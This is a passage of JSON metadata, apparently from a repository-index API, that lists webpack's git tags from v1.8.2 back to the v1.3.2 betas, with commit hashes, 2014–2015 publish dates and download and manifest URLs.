ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54: